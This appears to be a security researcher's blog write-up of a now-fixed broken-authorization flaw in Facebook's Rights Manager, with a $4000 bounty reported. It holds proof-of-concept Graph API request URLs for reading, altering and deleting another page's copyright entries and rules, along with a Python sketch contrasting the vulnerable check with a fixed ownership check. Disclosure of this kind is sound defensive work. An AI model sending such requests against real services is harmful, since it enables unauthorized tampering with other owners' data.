Free way to Facebook Freebooting | Hacking Rights Manager

Freebooting is a form of piracy, most commonly described as downloading someone else’s copyrighted material and re-uploading it to another internet platform, typically videos taken from YouTube and posted on Facebook. A security vulnerability in Facebook’s newly introduced platform, [Copy] Rights Manager (built to prevent freebooting), allows one to tamper with any Facebook brand page’s copyright data easily.

Facebook is trying hard to prevent freebooting in its native video player. In April, they introduced a tool called Rights Manager, which gives well-known brands the right to detect and claim their copyrighted videos uploaded to Facebook. People who repeatedly upload copyrighted videos can easily be identified by this feature.
Pages and profiles that keep uploading copyrighted material eventually get banned.

The Rights Manager tool lets brands upload their video items (the source videos used to detect pirated copies), and owners are notified whenever someone uploads one of their copyrighted videos to Facebook. Copyright owners can request deletion of the detected pirated videos or, in some cases, add an exception (whitelist) for a few brands.

So what’s the hack? 

Rights Manager’s application interface allows end users to manipulate the request data and gain control over other brand pages’ copyright source data.
In layman’s terms, Rights Manager’s authorization mechanism does not validate requests properly, so any Facebook user, without the page owner’s consent or permission, can read, edit and delete source videos or manipulate the detected pirated videos.

Technical Details

The Rights Manager tool is pre-approved for a few official pages, and anyone can request approval.

Facebook CopyRights Manager Tool Preview
Once approved, you can upload your videos to detect pirated copies across Facebook’s native video player.
Rights Manager uses the Graph API, and its official documentation lists some endpoints for third-party app access. By default, the Rights Manager GUI uses a pre-approved app called “273465416184080: Content Tab of a Page on www”. The access token can be seen in the page source of
https://www.facebook.com/page_username/publishing_tools/?section=NEW_MATCHES

Since this app is owned by Facebook, its access token allows us to read or manipulate data for any brand page: the endpoints perform insufficient permission checks on whether the caller actually administers the page that owns the targeted object.

Proof of Concept:

Updating Victim’s Copyright
https://graph.facebook.com/v2.6/<copyright_id_copied_from_victim_query>?method=post&monitoring_type=VIDEO_AND_AUDIO&access_token=<attacker_access_token>&whitelisted_ids=<attacker_ids_to_bypass_copyright_check>&rule_id=<any_rule_id_if_you_wish_optional_field>&ownership_countries=<can_update_countries_as_well_but_optional>
All of the fields passed as parameters above can be updated.

Reading Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyrights?access_token=<attacker_access_token>

Deleting Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_copyright_id>?method=delete&access_token=<attacker_access_token>

Create copyright rule on behalf of victim’s page
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>&name=testrule&condition_groups=[{action:"ALLOW",conditions:[{type:"MONITORING_TYPE",operator:"IS",value:"VIDEO_ONLY"}]}]

Read Victim’s Copyright Rules
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>

Delete Copyright Rule
https://graph.facebook.com/v2.6/<victim_page_copyright_rule_id>?method=delete&access_token=<attacker_access_token>
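The root cause of every request above is the same: a valid token from the pre-approved app was accepted without checking that the caller administers the page owning the copyright or rule. The following is an added example, not code from the original post or from Facebook, of the ownership check that closes that gap; all ids, tokens and the scope name are constructed sample values, and the bug pattern is shown beside the fixed check so the difference is visible in one place.

```python
# Added example, not code from the original post or from Facebook: a minimal
# server-side ownership check of the kind the Rights Manager endpoints lacked.
# Every id, token and scope name below is a constructed sample value.
from dataclasses import dataclass

@dataclass(frozen=True)
class Token:
    user_id: str
    app_id: str
    scopes: frozenset

RIGHTS_MANAGER_APP = "273465416184080"  # app id quoted in the post
REQUIRED_SCOPE = "pages_manage_rights"   # hypothetical scope name
WRITE_ACTIONS = {"create", "update", "delete"}

# Constructed fixtures: page -> {user: role}; copyright/rule id -> owning page.
PAGE_ROLES = {"page_victim": {"user_v": "ADMIN", "user_x": "ANALYST"},
              "page_attacker": {"user_a": "ADMIN"}}
OBJECT_OWNER = {"cr_100": "page_victim", "rule_7": "page_victim",
                "cr_200": "page_attacker"}
TOKENS = {"tok_a": Token("user_a", RIGHTS_MANAGER_APP, frozenset({REQUIRED_SCOPE})),
          "tok_v": Token("user_v", RIGHTS_MANAGER_APP, frozenset({REQUIRED_SCOPE})),
          "tok_x": Token("user_x", RIGHTS_MANAGER_APP, frozenset({REQUIRED_SCOPE})),
          "tok_noscope": Token("user_v", RIGHTS_MANAGER_APP, frozenset())}

def owning_page(target_id):
    """Target is a page id (for /video_copyrights listings) or a copyright or
    rule id; return the page that owns it, or None when the id is unknown."""
    return target_id if target_id in PAGE_ROLES else OBJECT_OWNER.get(target_id)

def vulnerable_authorize(token_str, target_id, action):
    """Bug pattern: any valid token from the pre-approved app passes, and the
    owning page is never compared with the caller."""
    tok = TOKENS.get(token_str)
    return (tok is not None and tok.app_id == RIGHTS_MANAGER_APP
            and owning_page(target_id) is not None)

def authorize(token_str, target_id, action):
    """Fixed check: the token needs the scope and its user needs a role on the
    page that owns the target; writes additionally require ADMIN."""
    tok = TOKENS.get(token_str)
    if tok is None or REQUIRED_SCOPE not in tok.scopes:
        return False
    page = owning_page(target_id)
    if page is None:
        return False  # unknown ids get the same answer as forbidden ones
    role = PAGE_ROLES[page].get(tok.user_id)
    return role == "ADMIN" or (role is not None and action not in WRITE_ACTIONS)
```

With the fixed check, `tok_a` can still manage its own `cr_200` but is refused on the victim’s `cr_100`, `rule_7` and `page_victim` listing, and an analyst role on the victim page may read but not update or delete.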

Facebook Acknowledgement of Fix and Bounty of $4000 USD

I thank the Facebook Security team for quickly fixing this issue 🙂

Feel free to use our free Facebook video downloader online tool to download Facebook videos, but beware of copyrights 😉

Laxman Muthiyah
This is the place where I write about things that I have explored. I hope you enjoy your stay!
